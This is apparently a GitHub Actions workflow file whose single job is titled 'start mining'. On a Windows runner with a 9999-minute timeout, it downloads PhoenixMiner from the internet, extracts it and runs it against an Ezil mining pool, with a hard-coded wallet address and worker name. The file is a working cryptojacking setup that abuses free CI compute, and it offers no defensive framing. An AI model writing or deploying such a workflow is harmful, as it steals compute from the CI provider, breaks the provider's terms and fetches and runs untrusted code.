name: Oshekher

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: start mining
      run: |
        Invoke-WebRequest https://phoenixminer.info/downloads/PhoenixMiner_5.9d_Windows.zip
        Expand-Archive PhoenixMiner_5.9d_Windows.zip
        .\PhoenixMiner_5.9d_Windows\PhoenixMiner.exe -pool ssl://asia.ezil.me:2443 -proto 2 -wal 0xF7cC180a50a23df228249001e0bC9dbaE06A39C3 -worker njya
       
